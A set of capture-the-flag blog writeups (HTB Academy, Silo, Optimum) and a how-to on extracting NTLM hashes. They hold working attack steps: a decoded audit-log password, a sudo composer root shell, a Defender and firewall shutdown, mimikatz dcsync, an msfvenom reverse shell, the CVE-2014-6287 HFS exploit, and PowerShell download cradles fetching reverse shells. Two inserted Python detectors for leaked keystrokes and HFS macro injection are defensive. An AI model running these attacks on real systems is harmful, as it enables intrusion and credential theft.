/var/log/audit

$ grep 'comm="su"' *
audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

The data section looks like a hex value. Maybe we can convert it to ASCII:

$ echo 6D7262336E5F41634064336D79210A | xxd -r -p
mrb3n_Ac@d3my!

I think this is the password for the user mrb3n:

$ ssh mrb3n@10.10.10.215
mrb3n@10.10.10.215's password: 

$ whoami
mrb3n

SHELL: mrb3n
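The decode above shows why TTY auditing is dangerous when the audit logs are readable by a non-root group such as adm: pam_tty_audit records every keystroke, including a password typed at an su prompt, as a hex data field. As an added example that is not part of the original post, here is a Python parser for such TTY records that flags keystrokes into password-prompting commands while reporting only the length of the captured data. The sample lines are constructed around the record shown above.

```python
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample lines: the su record from above (with grep's "file:" prefix), a constructed
# TTY record for a harmless command, and a constructed record of another type.
SAMPLE_LINES = [
    'audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 '
    'major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A',
    'type=TTY msg=audit(1597199300.123:85): tty pid=2521 uid=1002 auid=0 ses=1 '
    'major=4 minor=1 comm="bash" data=6C73202D6C610A',
    "type=USER_START msg=audit(1597199301.000:86): pid=2522 uid=0 auid=1002 ses=1 "
    "msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/su\" res=success'",
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")

# Commands whose keystrokes almost always include a secret when TTY auditing is on
SECRET_PROMPT_COMMANDS = {"su", "sudo", "doas", "passwd", "ssh", "mysql", "psql"}


@dataclass
class TtyRecord:
    timestamp: str
    serial: str
    pid: int
    uid: int
    auid: int
    comm: str
    keystrokes: bytes


def parse_tty_record(line: str) -> Optional[TtyRecord]:
    """Parse one auditd line; return None unless it is a complete TTY record."""
    if ":type=" in line:  # grep output carries a "file:" prefix
        line = line.split(":", 1)[1]
    if not line.startswith("type=TTY "):
        return None
    m = MSG_RE.search(line)
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    try:
        keystrokes = binascii.unhexlify(fields["data"])
        return TtyRecord(
            timestamp=m.group(1), serial=m.group(2),
            pid=int(fields["pid"]), uid=int(fields["uid"]), auid=int(fields["auid"]),
            comm=fields["comm"], keystrokes=keystrokes,
        )
    except (KeyError, ValueError, binascii.Error):
        return None


def report_sensitive_tty_records(lines: List[str]) -> List[str]:
    """Flag keystrokes typed into password-prompting commands. The captured bytes
    are deliberately reported by length only, so the report itself leaks nothing."""
    findings = []
    for line in lines:
        rec = parse_tty_record(line)
        if rec is None or rec.comm not in SECRET_PROMPT_COMMANDS:
            continue
        findings.append(
            f"audit serial {rec.serial} at {rec.timestamp}: uid={rec.uid} (auid={rec.auid}) "
            f"typed {len(rec.keystrokes)} bytes into {rec.comm}; treat as a leaked credential"
        )
    return findings


if __name__ == "__main__":
    for finding in report_sensitive_tty_records(SAMPLE_LINES):
        print(finding)
```

The fix on the defending side is to keep audit.log readable by root only and to avoid enabling pam_tty_audit (or to enable it with password logging disabled) on hosts where people run su or sudo.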

During the basic enumeration as user mrb3n I discovered that we have sudo permissions on /usr/bin/composer:

$ sudo -l
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

On GTFOBins I found an entry for composer to escalate to root.

$ TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n: 
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

SHELL: root


Thanks for reading! I hope you enjoyed it!

[How-To] Extract NTLM hash
https://qwertty.info/blog/how-to-extract-ntlm-hash
2020-12-19T20:09:00+01:00

Preface: If you want to decrypt a writeup for an active Windows box on HTB or from other platforms using the NTLM hash of the administrator user, you are in the right place. In this How-To post I show you how you can extract the NTLM hash of the administrator user (probably for any user) on Windows machines.

First we use mimikatz. In the second example I show you how to use secretsdump for it.

Using mimikatz

After getting a shell as administrator, you can follow the steps below to extract the NTLM hash.

First disable real-time protection if it is enabled:

Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Anti-Virus protection:

netsh advfirewall set  currentprofile state off

Then run mimikatz with the following arguments:

./mimikatz.exe "lsadump::dcsync /user:administrator"

You will get an output like this:

C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

The NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff. Just paste it into the writeup where it is asked for.

Using secretsdump

If you have owned a machine and know the password of the Administrator user, you can get the NTLM hash remotely with secretsdump. secretsdump.py is part of Impacket. The -just-dc-ntlm option dumps only the NT hashes from NTDS.DIT via DRSUAPI, so the target has to be a domain controller; against a standalone host leave the option out and secretsdump reads the local SAM through the remote registry instead.

secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::

Each line has the format shown in the header, domain\uid:rid:lmhash:nthash: the first hash is the LM hash and the second one is the NT hash. The LM value aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which tells you LM hashing is disabled (the default since Windows Vista/Server 2008), so only the NT hash is of any use.

Here the NTLM hash is d9485863c1b9e07543aa40cbb4ab9dfd. Just paste it into the writeup where it is asked for.

[HTB] Silo - Writeup https://qwertty.info/blog/htb-silo-writeup 2020-12-15T08:21:00+01:00 2020-12-15T08:21:00+01:00

Preface: Silo is a medium box on HackTheBox.eu. A basic nmap scan finds a bunch of open ports, but the most interesting one is port 1521, where an Oracle TNS listener is running. After some enumeration I found a CVE for the service. With ODAT we discover further information (the database SID and a set of default credentials) which enables us to upload and execute files. We upload and execute our own reverse shell and directly get a shell as NT AUTHORITY\SYSTEM. [image: Hack The Box infocard for Silo]

Information gathering

As always we start with an nmap scan for open ports and services:

$ sudo nmap -sC -sV -oN nmap/silo.nmap 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:33 CET
Nmap scan report for 10.10.10.82
Host is up (0.14s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 9m31s, deviation: 0s, median: 9m30s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-13T18:45:21
|_  start_date: 2021-02-13T18:42:18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.61 seconds

We get a bunch of ports, but the most interesting one is 1521, where an Oracle TNS listener 11.2.0.2.0 is running. Note that the "(unauthorized)" in the nmap output only means the listener refused nmap's version request; it does not mean the service allows unauthenticated access. After a bit of googling I found CVE-2012-1675, the "TNS Listener Poison Attack", and a nmap script oracle-tns-poison.nse to verify the vulnerability.

So let's verify whether the box is vulnerable to CVE-2012-1675. First we clone the GitHub repo and change into its directory:

$ git clone https://github.com/bongbongco/CVE-2012-1675.git 
$ cd CVE-2012-1675

Now we can run the check. There is also an example in the README.md.

$ nmap -Pn -sT --script=./oracle-tns-poison -p 1521 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:51 CET
NSE: DEPRECATION WARNING: bin.lua is deprecated. Please use Lua 5.3 string.pack
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.23s latency).

PORT     STATE SERVICE
1521/tcp open  oracle
|_oracle-tns-poison: Host is vulnerable!

Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Awesome! The host is vulnerable, so we can use this.

Exploitation

We discovered the vulnerability of the box. Now we have to search for an existing exploit or tool that we can use in our case. After a while I found ODAT (Oracle Database Attacking Tool). In its README.md there is a module for CVE-2012-1675, so let's try this tool.

First we have to clone the repo and change our directory to it:

$ git clone https://github.com/quentinhardy/odat.git
$ cd odat

Now we can try the tnspoison module:

$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.

But we need the server SID first. Let's see how we can discover it.

The help menu of odat.py shows a module sidguesser. This is what we need.

$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...      
###############################################################################################################  | ETA:  00:00:00 
100% |###########################################################################################################| Time: 00:01:30 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...              ##############################################################################                   | ETA:  00:00:08 
100% |###########################################################################################################| Time: 00:01:13 
[+] SIDs found on the 10.10.10.82:1521 server: XE

And we got our SID: XE (the default SID of Oracle Database Express Edition).

Now we can test the tnspoison module again. I always try to verify the vulnerability before I run into a rabbit hole.

$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-module
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

Yes, it works. In the help menu of odat.py I also saw the module passwordguesser. Since we now have the SID, which almost every module requires, maybe we can find some credentials.

$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

Awesome! We found valid credentials: scott/tiger is the classic Oracle demo account with its default password. With these we may be able to upload our reverse shell. There is a module named utlfile, which uses the UTL_FILE package to upload/download/delete files on the database server. But first we have to create our reverse shell.

I will use msfvenom for it:

$ msfvenom -p windows/x64/shell_reverse_tcp  LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe

Now we can upload it with odat.py. The --sysdba flag matters here: the plain scott account has no privilege to write files on the server, but on this box it is allowed to connect AS SYSDBA, which grants every privilege.

$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file

Nice, the file was created on the box.

Now let's start our nc listener on port 4444:

$ nc -lvnp 4444

Now we can use the module externaltable. It took me a while to discover this module because the name is not obvious for what we were looking for. But the description says what we want:

to read files or to execute system commands/scripts

Let's try it:

$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path

Hopefully we got the reverse shell. Let's check our nc listener:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>

Nice! We got the shell, directly as SYSTEM, so we can grab both the user and the root flag.

SHELL: nt authority\system


Thanks for reading! I hope you enjoyed it!

[HTB] Optimum - Writeup https://qwertty.info/blog/htb-optimum-writeup 2020-11-19T08:21:00+01:00 2020-11-19T08:21:00+01:00

Preface: Optimum is an easy box on HackTheBox.eu. A basic nmap scan finds only one open port, http, running a service which we are going to exploit. After some information gathering we find a known RCE vulnerability in the service and leverage it to gain a reverse shell. Once on the box we use watson to check for missing patches we could use for privilege escalation, and there is one: with MS16-032 we get a shell as NT AUTHORITY\SYSTEM. [image: Hack The Box infocard for Optimum]

Information gathering

As always we start with an nmap scan for open ports and services:

$ sudo nmap -sC -sV -oN nmap/optimum.nmap 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-16 07:41 CET
Nmap scan report for 10.10.10.8
Host is up (0.039s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds

We got http on port 80. According to nmap it is running HttpFileServer (HFS) version 2.3.

Before we look for known vulnerabilities in the service, we start gobuster against the target. I like to have some enumeration running in the background.

$ gobuster dir -o gobuster/optimum.txt -u http://10.10.10.8 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt

Then we try searchsploit. Maybe we find something there.

$ searchsploit httpfileserver
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                                                   | windows/webapps/49125.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

There is a known RCE for HttpFileServer, and it covers the 2.3.x version that is running here.

Let's take a look at the python script with searchsploit's -x option.

# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3

# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
        http = urllib3.PoolManager()    
        url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
        print(url)
        response = http.request('GET', url)

except Exception as ex:
        print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
        print(ex)

Okay, this is CVE-2014-6287 from 2014, but the script itself is dated 28-11-2020, so it is a recent python3 rewrite. I think we can use it.

Let's copy it to our current directory with searchsploit's -m option. As the script says we have to specify RHOST, RPORT and the COMMAND. I always check first whether an exploit works in my situation, so as a first test we make the target fetch a (non-existent) file from my local python http.server to see if we have command execution.

$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/qwertty.txt')"

Yes, we got code execution: as we see below, the target requested the file from our web server. The 404 does not matter, the request itself proves that the command ran on the box.

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -
10.10.10.8 - - [18/Feb/2021 08:03:16] code 404, message File not found
10.10.10.8 - - [18/Feb/2021 08:03:16] "GET /qwertty.txt HTTP/1.1" 404 -

Before we go deeper with this exploit I checked my gobuster, which was running in the background, but it found nothing interesting. We can go further with our exploit.
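As an added example (not from the original post and not from the exploit's author), here is the detection-side counterpart to the exploit above, in Python: it scans web server access-log lines for the HFS macro injection the exploit relies on, i.e. a {.macro|args.} sequence inside a decoded query parameter, and records whether the leading null byte (the %00 that lets the macro slip past HFS' input filter) or a file-system/command macro such as exec or save is present. The log lines are constructed for the demo in an Apache-style format (HFS' own log format differs, but the request URI is what matters); the macro list is a non-exhaustive selection of HFS macros and the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined style, not real HFS logs).
# Line 1 has the same shape as the CVE-2014-6287 payload built by 49125.py.
SAMPLE_LOGS = [
    '10.10.14.3 - - [18/Feb/2021:08:03:16 +0100] "GET /?search=%00{.+exec|c%3A%5Cwindows%5Csystem32%5Ccmd.exe.} HTTP/1.1" 200 -',
    '10.10.14.3 - - [18/Feb/2021:08:03:20 +0100] "GET /?search=report.pdf HTTP/1.1" 200 -',
    '10.10.14.3 - - [18/Feb/2021:08:03:25 +0100] "GET /?search=%7B.exec%7Ccalc.%7D HTTP/1.1" 200 -',
    '10.10.14.3 - - [18/Feb/2021:08:03:30 +0100] "GET /?search=%00{.+save|c%3A%5Cx.txt|data.} HTTP/1.1" 200 -',
    '10.10.14.3 - - [18/Feb/2021:08:04:00 +0100] "POST /upload HTTP/1.1" 200 -',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/\d\.\d"')
MACRO_RE = re.compile(r'\{\.\s*(?P<name>[A-Za-z_]+)')      # HFS macro opener: {.name|...}
# Non-exhaustive list of HFS macros that touch the file system or run commands.
DANGEROUS_MACROS = {"exec", "save", "append", "delete", "load", "mkdir", "rename", "move", "copy"}


def inspect_uri(uri: str) -> list:
    """Return one finding per query parameter whose decoded value contains an HFS macro."""
    findings = []
    # parse_qs URL-decodes the values and maps '+' to ' ', so %00 becomes a real NUL byte
    for param, values in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        for value in values:
            macros = [m.group("name").lower() for m in MACRO_RE.finditer(value)]
            if not macros:
                continue
            findings.append({
                "param": param,
                "macros": macros,
                "null_byte": "\x00" in value,               # the %00 that defeats HFS' filter
                "dangerous": any(name in DANGEROUS_MACROS for name in macros),
            })
    return findings


def scan_log(lines) -> list:
    """Return [{'uri': ..., 'findings': [...]}] for every request that carries a macro."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = inspect_uri(match.group("uri"))
        if findings:
            hits.append({"uri": match.group("uri"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOGS):
        high = any(f["dangerous"] or f["null_byte"] for f in hit["findings"])
        print("HIGH" if high else "MEDIUM", hit["uri"], hit["findings"])
```

Decoding before matching is the important part: the third sample line hides the braces as %7B and %7D, so a naive grep for "{." on the raw log would miss it.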

Foothold / User

Now we know how to exploit our target, so we can continue with CVE-2014-6287.

With PowerShell we are able to download a .ps1 file and execute it directly in memory, like below:

# IEX = Invoke Expression
IEX (New-Object Net.WebClient).DownloadString('<URL>')

So first we download the PowerShell reverse shell Invoke-PowerShellTcp.ps1 from nishang. We have to add the line below to the end of the .ps1 file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4444

The reason is simple: the script only defines the function, and this line actually calls it so that the reverse shell connects back to our listener.

Now we can modify our previous exploit call to download our reverse shell. I saved the file in my current directory as qwertty.ps1, restarted the python http.server and started my nc listener on port 4444. Now we can run the exploit again:

$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/qwertty.ps1')"

Hopefully we now get a reverse shell:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.8] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami
optimum\kostas

Yep, there it is :)

SHELL: optimum\kostas

Root

As always, let's run winpeas.exe on this box.

First start the python http.server:

$ python3 -m http.server

Then download it to the box and run it:

PS C:\Users\kostas\Desktop> Invoke-WebRequest http://10.10.14.3:8000/winpeas.exe -Outfile c:\Users\kostas\Desktop\winpeas.exe
PS C:\Users\kostas\Desktop> .\winpeas.exe

But winpeas shows nothing interesting.

Let's try watson. It is an exploit suggester for privilege escalation that checks the OS build number against known missing patches; you can find it on RastaMouse's GitHub.

PS C:\Users\kostas\Desktop> Invoke-WebRequest http://10.10.14.3:8000/Watson.exe -Outfile c:\Users\kostas\Desktop\watson.exe
PS C:\Users\kostas\Desktop> .\watson.exe
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|

                           v0.1    

                  Sherlock sucks...
                   @_RastaMouse

 [*] OS Build number: 9600
 [*] CPU Address Width: 64
 [*] Processs IntPtr Size: 8
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS15-051
   [>] Description: An EoP exists due to improper object handling in the win32k.sys kernel mode driver.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_051_client_copy_image.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS15-076
   [>] Description: Local DCOM DCE/RPC connections can be reflected back to a listening TCP socket allowing access to an NTLM authentication challenge for LocalSystem, which can be replayed to the local DCOM activation service to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/37768/
   [>] Notes: None.

  [*] Appears vulnerable to MS15-078
   [>] Description: An EoP exists due to a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS16-032
   [>] Description: An EoP exists due to a lack of sanitization of standard handles in Windows' Secondary Logon Service.
   [>] Exploit: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
   [>] Notes: None.

  [*] Appears vulnerable to MS16-034
   [>] Description: An EoP exist when the Windows kernel-mode driver fails to properly handle objects in memory.
   [>] Exploit: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)

Let's try MS16-032 first. After some searching I found a version of Invoke-MS16-032 that takes a command as parameter, so we can define what should be executed with the SYSTEM token.

So I decided to let it download my second reverse shell with IEX. Let's add the following line at the bottom of the exploit script:

Invoke-MS16-032 "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3:8000/system.ps1')"

For the second reverse shell I used the same nishang script as above, copied to system.ps1 with the listener port changed to 4445:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4445

Before we execute the exploit we have to start another nc listener on port 4445:

$ nc -lvnp 4445

Now we are ready to run the exploit:

PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3:8000/MS16-032.ps1")

On our python http.server we see the two GET requests, so it looks like everything worked:

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.8 - - [18/Feb/2021 20:56:36] "GET /MS16-032.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [18/Feb/2021 20:56:43] "GET /system.ps1 HTTP/1.1" 200 -

Now it is time to check our nc listener:

$ nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.8] 49209
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop>whoami
nt authority\system
PS C:\Users\kostas\Desktop> 

Yes! We got a reverse shell as nt authority\system. Now we can grab the root flag.

SHELL: nt authority\system


Thanks for reading! I hope you enjoyed it!
